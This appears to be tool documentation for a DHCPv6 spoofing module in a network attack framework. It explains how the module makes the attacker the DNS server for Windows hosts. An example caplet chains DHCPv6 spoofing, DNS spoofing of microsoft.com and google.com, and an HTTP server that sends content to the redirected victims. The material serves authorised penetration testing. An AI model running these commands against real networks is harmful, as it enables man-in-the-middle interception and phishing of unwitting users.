dhcp6.spoof

This module’s purpose is attacking Microsoft Windows hosts by replying to DHCPv6 messages and providing the target with a link-local IPv6 address and setting the attacker host as default DNS server (as described here).

This module must be used together with dns.spoof module in order to be effective.

Commands

dhcp6.spoof on

Start the DHCPv6 spoofer in the background.

dhcp6.spoof off

Stop the DHCPv6 spoofer in the background.

Parameters

parameterdefaultdescription
dhcp6.spoof.domainsmicrosoft.com, goole.com, facebook.com, apple.com, twitter.comComma separated values of domain names to spoof.

Examples

The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:

  1. # let's spoof Microsoft and Google ^_^
  2. set dns.spoof.domains microsoft.com, google.com
  3. set dhcp6.spoof.domains microsoft.com, google.com
  5. # every http request to the spoofed hosts will come to us
  6. # let's give em some contents
  7. set http.server.path /var/www/something
  9. # serve files
  10. http.server on
  11. # redirect DNS request by spoofing DHCPv6 packets
  12. dhcp6.spoof on
  13. # send spoofed DNS replies ^_^
  14. dns.spoof on
  16. # set a custom prompt for ipv6
  17. set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold {reset}
  18. # clear the events buffer and the screen
  19. events.clear
  20. clear